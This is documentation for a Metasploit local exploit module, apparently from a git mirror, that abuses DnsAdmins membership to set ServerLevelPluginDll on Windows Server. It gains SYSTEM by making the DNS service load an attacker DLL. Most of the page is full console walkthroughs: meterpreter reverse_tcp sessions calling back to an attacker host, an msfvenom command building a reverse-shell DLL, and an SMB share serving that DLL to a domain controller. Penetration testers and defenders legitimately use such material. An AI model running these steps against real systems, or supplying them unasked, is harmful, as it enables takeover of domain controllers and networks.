metasploit-gs/documentation/modules/exploit/windows/local/dnsadmin_serverlevelplugindll.md at d0fe87fbf65205dd258cbb055094dc72cb0f8f7a

Files

T

gwillcox-r7 d0fe87fbf6 Update documentation with some updated info about potentially bad situations the module could run into, and also include some new documentation on the new option we have added in to try to prevent this from happening

2020-09-10 11:32:18 -05:00

12 KiB

Raw Blame History

Introduction

This module exploits a feature in the DNS service of Windows Server. Users of the DnsAdmins group can set the ServerLevelPluginDll value using dnscmd.exe to create a registry key at HKLM\SYSTEM\CurrentControlSet\services\DNS\Parameters\ named ServerLevelPluginDll that can be made to point to an arbitrary DLL. Restarting the DNS service will then result in the attacker's DLL being loaded and executed as the SYSTEM user, thereby granting the attacker SYSTEM privileges.

Note that there is a slight possibilty that antivirus may pick up on the DLL file which is dropped on the system for this exploit to work. In this case it will not be possible to restart the DNS service via the Service Manager. To resolve this, users must first delete the ServerLevelPluginDll value under the HKLM\\SYSTEM\\CurrentControlSet\\Services\\DNS\\Parameters\\ key using an administrator account, after which they will then be able to restart the DNS service once again.

To avoid the potential of this occuring, this module has a configurable option, AVTIMEOUT, which allows users to configure how long they would like to wait for any potential AV to pick up on the file after which the module will then check to ensure the dropped DLL file exists prior to creating the ServerLevelPluginDll value within the HKLM\\SYSTEM\\CurrentControlSet\\Services\\DNS\\Parameters\\ key.

Users wishing to use this module with UNC paths to load the DLL from a SMB share onto the target are recommended to increase the value of WfsDelay to prevent potential timeouts.

Vulnerable Application

Windows Server 2003 and above

Verification Steps

Get a Meterpreter shell
use exploit/windows/local/dnsadmin_serverlevelplugindll
set PAYLOAD <payload>. Payload architecture must be the same as the target system
set LHOST <lhost>
set LPORT <lport>
set SESSION <session_no> to specify session
set DLLNAME <dllname> if you want to name your DLL something other than msf.dll
set DLLPATH <dllpath> if you want to place your DLL somewhere other than %TEMP% or if you want to use a UNC path
set MAKEDLL true if you want to just make the DLL, and not carry out the exploit
exploit to get SYSTEM shell if MAKEDLL is set to false, or to write the DLL to the ~/.msf4/local folder if MAKEDLL is set to true

Options

DLLNAME

Name of the DLL to use.

DLLPATH

Location of the DLL to use. If a UNC path is provided, the module will assume that the operator has already performed the following actions:

Set up a working SMB2 share (via a tool such as Impacket's smbserver.py)
Created a DLL of the same architecture as the target system and placed in within this share.

MAKEDLL

If set to true, then just create the DLL, do not conduct the full exploit. The resulting DLL will be stored in the ~/.msf4/local directory.

AVTIMEOUT

Time, in seconds, to wait for any AV on the target system to potentially pick up on the dropped DLL file, prior to the module checking to see if the DLL file still exists. This is needed to prevent a scenario where the DLL file gets removed and the module tries to make changes that could prevent the DNS server from being able to start.

Scenarios

Windows Server 2019 Standard x64, writing `msf.dll` to `%TEMP%`

msf5 > sessions

Active sessions
===============

  Id  Name  Type                     Information                            Connection
  --  ----  ----                     -----------                            ----------
  1         meterpreter x64/windows  BASILISKCORP\salazar.slytherin @ DC01  192.168.137.139:4444 -> 192.168.137.133:56312 (192.168.137.133)

msf5 > use exploit/windows/local/dnsadmin_serverlevelplugindll 
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set LHOST 192.168.137.139
LHOST => 192.168.137.139
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set LPORT 4444
LPORT => 4444
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set SESSION 1 
SESSION => 1
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set VERBOSE true
VERBOSE => true
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > exploit

[*] Started reverse TCP handler on 192.168.137.139:4444 
[+] OS seems vulnerable.
[*] Running check against DC01 as user BASILISKCORP\salazar.slytherin...
[+] DNS service found on DC01.
[+] User BASILISKCORP\salazar.slytherin is part of the DnsAdmins group.
[*] DnsAdmins SID is S-1-5-21-2123406164-4007834289-1418149283-1101
[*] Checking service state...
[*] Building DLL...
[*] Writing DLL to C:\Users\SALAZA~1.SLY\AppData\Local\Temp\msf.dll...
[*] Modifying ServerLevelPluginDll to point to C:\Users\SALAZA~1.SLY\AppData\Local\Temp\msf.dll...
[+] Registry property serverlevelplugindll successfully reset.
[*] Restarting the DNS service...
[*] Sending stage (206403 bytes) to 192.168.137.133
[*] Meterpreter session 2 opened (192.168.137.139:4444 -> 192.168.137.133:56319) at 2020-05-16 01:41:53 +0800

meterpreter > 
[*] Erasing ServerLevelPluginDll registry value...restarting.
Computer        : DC01
OS              : Windows 2016+ (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : BASILISKCORP
Logged On Users : 16
Meterpreter     : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

Windows Server 2019 Standard x64, specifying a UNC path for ServerLevelPluginDll

The fastest way to get a share up and running is to use Impacket's smbserver:

msfdev2@automata-ng:~$ mkdir ~/test; sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support -ip 192.168.137.139 test ~/test
[sudo] password for msfdev2: 
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

You can generate a DLL using the module by setting MAKEDLL to true:

msf5 > sessions

Active sessions
===============

  Id  Name  Type                     Information                            Connection
  --  ----  ----                     -----------                            ----------
  1         meterpreter x64/windows  BASILISKCORP\salazar.slytherin @ DC01  192.168.137.139:4444 -> 192.168.137.133:56307 (192.168.137.133)

msf5 > use exploit/windows/local/dnsadmin_serverlevelplugindll 
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set LHOST 192.168.137.139
LHOST => 192.168.137.139
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set LPORT 4444
LPORT => 4444
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set DLLNAME test.dll
DLLNAME => test.dll
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set MAKEDLL true
MAKEDLL => true
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set SESSION 1 
SESSION => 1
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > exploit

[*] Started reverse TCP handler on 192.168.137.139:4444 
[*] Building DLL...
[+] test.dll stored at /home/msfdev2/.msf4/local/test.dll
[*] Exploit completed, but no session was created.
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) >

Once the DLL has been generated, copy it to the folder shared by Impacket's smbserver:

msfdev2@automata-ng:~$ cp /home/msfdev2/.msf4/local/test.dll ~/test/test.dll 
msfdev2@automata-ng:~$

Alternatively, you can generate a DLL using msfvenom:

msfdev2@automata-ng:~$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.137.139 LPORT=4444 -f dll -o ~/test/test.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 510 bytes
Final size of dll file: 5120 bytes
Saved as: /home/msfdev2/test/test.dll
msfdev2@automata-ng:~$

After that, proceed with the actual exploit:

msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set MAKEDLL false
MAKEDLL => false
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set DLLPATH \\\\192.168.137.139\\test
DLLPATH => \\192.168.137.139\test
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set DLLNAME test.dll
DLLNAME => test.dll
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set VERBOSE true
VERBOSE => true
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > exploit

[*] Started reverse TCP handler on 192.168.137.139:4444 
[+] OS seems vulnerable.
[*] Running check against DC01 as user BASILISKCORP\salazar.slytherin...
[+] DNS service found on DC01.
[+] User BASILISKCORP\salazar.slytherin is part of the DnsAdmins group.
[*] DnsAdmins SID is S-1-5-21-2123406164-4007834289-1418149283-1101
[*] Checking service state...
[*] Using user-provided UNC path.
[*] Modifying ServerLevelPluginDll to point to \\192.168.137.139\test\test.dll...
[+] Registry property serverlevelplugindll successfully reset.
[*] Restarting the DNS service...
[*] Sending stage (206403 bytes) to 192.168.137.133
[*] Meterpreter session 2 opened (192.168.137.139:4444 -> 192.168.137.133:56493) at 2020-05-16 03:45:09 +0800

meterpreter > sysinfo
Computer        : DC01
OS              : Windows 2016+ (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : BASILISKCORP
Logged On Users : 18
Meterpreter     : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

Windows Server 2019 Standard x64, just creating DLL

msf5 > sessions

Active sessions
===============

  Id  Name  Type                     Information                            Connection
  --  ----  ----                     -----------                            ----------
  1         meterpreter x64/windows  BASILISKCORP\salazar.slytherin @ DC01  192.168.137.139:4444 -> 192.168.137.133:56478 (192.168.137.133)

msf5 > use exploit/windows/local/dnsadmin_serverlevelplugindll 
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set LHOST 192.168.137.139
LHOST => 192.168.137.139
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set LPORT 4444
LPORT => 4444
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set SESSION 1 
SESSION => 1
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set MAKEDLL true
MAKEDLL => true
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set DLLNAME test.dll
DLLNAME => test.dll
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > exploit

[*] Started reverse TCP handler on 192.168.137.139:4444 
[*] Building DLL...
[+] test.dll stored at /home/msfdev2/.msf4/local/test.dll
[*] Exploit completed, but no session was created.
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) >

Notes

This module is not particularly opsec-safe as it drops a DLL to disk, writes to the registry, and is sure to generate a ton of event logs when the DNS service is stopped and restarted.
The service will crash if the DLL used does not contain the right exports, so using the msfvenom generated DLL will definitely cause it to crash.
Automatic cleanup of the dropped DLL is attempted if the DLL has been written to disk, but if automatic cleanup fails manual cleanup may be necessary.

12 KiB Raw Blame History